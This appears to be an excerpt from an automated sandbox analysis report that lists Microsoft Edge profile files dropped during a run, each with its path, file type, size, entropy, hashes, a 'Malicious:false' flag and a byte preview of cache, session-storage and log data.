                                                                                                                                                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:0\r..m..................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.527150097341792
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:WwmFcFXTXl/lw/l9/lxEstllI/lyLl:Wp0zQOs2yLl
                                                                                                                                                                                                                                                                                                MD5:F607023F7DA13F448156031861542C79
                                                                                                                                                                                                                                                                                                SHA1:FDB3803BA2FE2155FBEBB7628AB43FA9F13233D5
                                                                                                                                                                                                                                                                                                SHA-256:8392281C98EEE5D95E5CDCA7BF0E1BE8B879AD05D712891AE6B94F7E4D7B8D48
                                                                                                                                                                                                                                                                                                SHA-512:6B4573B6EA4257737D59769949E1B357144AF1A68511650CADC43756F312FCE132E12572F03BC83BCCB0F9E4C0FC732E72E1A59656D850D78CBB8180ABDE2C70
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:@...c.C.oy retne.........................X....,................MnT.s./.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.527150097341792
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:WwmFcFXTXl/lw/l9/lxEstllI/lyLl:Wp0zQOs2yLl
                                                                                                                                                                                                                                                                                                MD5:F607023F7DA13F448156031861542C79
                                                                                                                                                                                                                                                                                                SHA1:FDB3803BA2FE2155FBEBB7628AB43FA9F13233D5
                                                                                                                                                                                                                                                                                                SHA-256:8392281C98EEE5D95E5CDCA7BF0E1BE8B879AD05D712891AE6B94F7E4D7B8D48
                                                                                                                                                                                                                                                                                                SHA-512:6B4573B6EA4257737D59769949E1B357144AF1A68511650CADC43756F312FCE132E12572F03BC83BCCB0F9E4C0FC732E72E1A59656D850D78CBB8180ABDE2C70
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:@...c.C.oy retne.........................X....,................MnT.s./.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF2b0d7.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.527150097341792
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:WwmFcFXTXl/lw/l9/lxEstllI/lyLl:Wp0zQOs2yLl
                                                                                                                                                                                                                                                                                                MD5:F607023F7DA13F448156031861542C79
                                                                                                                                                                                                                                                                                                SHA1:FDB3803BA2FE2155FBEBB7628AB43FA9F13233D5
                                                                                                                                                                                                                                                                                                SHA-256:8392281C98EEE5D95E5CDCA7BF0E1BE8B879AD05D712891AE6B94F7E4D7B8D48
                                                                                                                                                                                                                                                                                                SHA-512:6B4573B6EA4257737D59769949E1B357144AF1A68511650CADC43756F312FCE132E12572F03BC83BCCB0F9E4C0FC732E72E1A59656D850D78CBB8180ABDE2C70
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:@...c.C.oy retne.........................X....,................MnT.s./.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6061
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4242634171529645
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:b9x275T1ts/z535MnGb/jpmrpp+e+VibseiVsZ0/gtOXuDO4up+Oa3W3rU:+MMS70lp+eKioeiG0/gts9MOal
                                                                                                                                                                                                                                                                                                MD5:5121F9D6AAD1F23B85024CFAB830AADF
                                                                                                                                                                                                                                                                                                SHA1:B582843E31A17DD6362B792F41DB132E70D297E3
                                                                                                                                                                                                                                                                                                SHA-256:439924245BF605FB02501E1E6D03F5C1E6499A78D8D2885CD7F8DFC43C620870
                                                                                                                                                                                                                                                                                                SHA-512:BB5175CAFA174448F8BBC4A2D74CDE91BE7D88D21F6588C0A955EDED29418C1E7FB537C6EFA3CD6D376D3E7D24710EB897030853B8FDD6907C3C84E375431977
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................c.b................next-map-id.1.Cnamespace-e2f70f1f_db8c_4771_815d_5305acb9ba34-https://ntp.msn.com/.0V.e................V.e................V.e................V.e................AU..B................map-0-shd_sweeper.,{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.p.w.-.b.x.a.p.m.i.g.,.1.s.-.b.i.n.g.-.x.a.p.m.i.g.,.p.r.g.-.a.d.s.-.b.x.g.,.p.r.g.-.h.p.-.n.b.-.i.n.f.s.v.,.1.s.-.w.p.o.-.m.s.n.a.d.,.1.s.-.w.p.o.-.w.a.t.e.r.f.a.l.l.,.p.r.g.-.1.s.w.-.h.o.m.e.m.s.n.,.p.r.g.-.1.s.w.-.s.a.x.a.i.v.2.,.p.r.g.-.h.o.m.e.t.o.-.h.p.m.s.n.,.p.r.g.-.h.p.-.f.v.-.n.o.b.a.d.,.p.r.g.-.h.p.-.r.d.c.v.,.p.r.g.-.h.p.-.s.f.-.f.v.,.p.r.g.-.h.p.-.s.w.i.t.c.h.f.e.e.d.,.p.r.g.-.m.s.n.-.i.d.,.p.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):319
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.167249273403138
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvCp+q2Pwkn23oH+TcwtrQMxIFUtdCfFZZmwrCFBVkwOwkn23oH+TcwtrQMFLJ:7qkvYfYebCFUtYfX/eFP5JfYebtJ
                                                                                                                                                                                                                                                                                                MD5:F177A653504C1701CD2C38AE867BA0DB
                                                                                                                                                                                                                                                                                                SHA1:B5D336A857AA2EC86F76FD84F1AB6AA2F5B13DF7
                                                                                                                                                                                                                                                                                                SHA-256:9931435A9BB98F7A017560A0216255068747B9E3811D6D415EA3412758C14A62
                                                                                                                                                                                                                                                                                                SHA-512:EEB50D44319D32DB287717765182680FE53480050195534996996A14187FE79639C03BD7B1B0F4A673963235D7F53E65F7E898ADC178BB1BB6B873D47B81AAEA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:30.913 4b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/03/08-18:43:30.915 4b8 Recovering log #3.2025/03/08-18:43:30.920 4b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):319
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.167249273403138
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvCp+q2Pwkn23oH+TcwtrQMxIFUtdCfFZZmwrCFBVkwOwkn23oH+TcwtrQMFLJ:7qkvYfYebCFUtYfX/eFP5JfYebtJ
                                                                                                                                                                                                                                                                                                MD5:F177A653504C1701CD2C38AE867BA0DB
                                                                                                                                                                                                                                                                                                SHA1:B5D336A857AA2EC86F76FD84F1AB6AA2F5B13DF7
                                                                                                                                                                                                                                                                                                SHA-256:9931435A9BB98F7A017560A0216255068747B9E3811D6D415EA3412758C14A62
                                                                                                                                                                                                                                                                                                SHA-512:EEB50D44319D32DB287717765182680FE53480050195534996996A14187FE79639C03BD7B1B0F4A673963235D7F53E65F7E898ADC178BB1BB6B873D47B81AAEA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:30.913 4b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/03/08-18:43:30.915 4b8 Recovering log #3.2025/03/08-18:43:30.920 4b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13385951012245184

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1443
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7788258212255834
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:3p4E5WmllzuPmnmZGpsAF4unxstLp3X2amEtG1ChqpUjJve7l9QKkOAM4:3p45euePzF6Lp2FEkChYUtve7IHOp
                                                                                                                                                                                                                                                                                                MD5:1DF20946D7233CA045693BC637646A5D
                                                                                                                                                                                                                                                                                                SHA1:CA7869DCE62C759ECCCD5EF12AB8E63B4AB5B1F1
                                                                                                                                                                                                                                                                                                SHA-256:3A550A47D18DDCCA7230DB1E7997DF6EAAA34B5001D40F9D4E2D702020F22312
                                                                                                                                                                                                                                                                                                SHA-512:4062F5C0228378B898BC44B3EDBC2CC8A3DEB0E784B7D939F7402CEF6D1E547D51C81EFC062528DCB0015C9411167C8700F4B49083E593ED680D0D02AE077951
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SNSS........61}............61}......".61}............61}........61}........61}........61}....!...61}................................61}.61}1..,....61}$...e2f70f1f_db8c_4771_815d_5305acb9ba34....61}........61}................61}....61}........................61}....................5..0....61}&...{6EDED7FE-60E2-427F-A578-9758204D4AA7}......61}...........61}........................61}............61}........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x..........N./.....N./.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):350
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.188023186265039
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvrROq2Pwkn23oH+Tcwt7Uh2ghZIFUtdrRXZmwrHwzkwOwkn23oH+Tcwt7Uh2gd:7IvYfYebIhHh2FUt7/rwz5JfYebIhHLJ
                                                                                                                                                                                                                                                                                                MD5:FA2F0B290EC473A623B0E644A984EF49
                                                                                                                                                                                                                                                                                                SHA1:E5815C173EEF0EABAA6254341913768D0EB0C26C
                                                                                                                                                                                                                                                                                                SHA-256:20984E29FD51F56DC64C5F345F74249AAEF7C3BC511F3D15C85661817049E288
                                                                                                                                                                                                                                                                                                SHA-512:B63C2F450DDDA0D7453FA425F684BB93514F67891B812340388FD7EF92A20C5E0BB1C2D4C6577B330CD62FB76F4CB04DA5BC0CD39E5D68F3D378C9DB5D887037
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:29.737 1e14 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/03/08-18:43:29.737 1e14 Recovering log #3.2025/03/08-18:43:29.738 1e14 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):350
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.188023186265039
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvrROq2Pwkn23oH+Tcwt7Uh2ghZIFUtdrRXZmwrHwzkwOwkn23oH+Tcwt7Uh2gd:7IvYfYebIhHh2FUt7/rwz5JfYebIhHLJ
                                                                                                                                                                                                                                                                                                MD5:FA2F0B290EC473A623B0E644A984EF49
                                                                                                                                                                                                                                                                                                SHA1:E5815C173EEF0EABAA6254341913768D0EB0C26C
                                                                                                                                                                                                                                                                                                SHA-256:20984E29FD51F56DC64C5F345F74249AAEF7C3BC511F3D15C85661817049E288
                                                                                                                                                                                                                                                                                                SHA-512:B63C2F450DDDA0D7453FA425F684BB93514F67891B812340388FD7EF92A20C5E0BB1C2D4C6577B330CD62FB76F4CB04DA5BC0CD39E5D68F3D378C9DB5D887037
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:29.737 1e14 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/03/08-18:43:29.737 1e14 Recovering log #3.2025/03/08-18:43:29.738 1e14 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_0

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_2

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_3

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\index

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):524656
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.027445846313988E-4
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:LsulCal/:LsPat
                                                                                                                                                                                                                                                                                                MD5:DE6BC6C322F7D2016B8BB5D1093AD970
                                                                                                                                                                                                                                                                                                SHA1:6E24A44DF2DAB129D0E3C518349417E2945C2526
                                                                                                                                                                                                                                                                                                SHA-256:F3B5FF4C4846951284225CE6FDD595E08038A326F8D2AD224598C24074ABAE14
                                                                                                                                                                                                                                                                                                SHA-512:EDF40D7F6F471AE2D0FD02143FAFB95C00EF3DCA0D6AAE212F364F3BC4D9D7197DB719B3BB59481ACE3CF894477B7EA39E95CD0BB72CE719DCF2E9C3438F3203
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................{.[.s./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_0

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_2

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
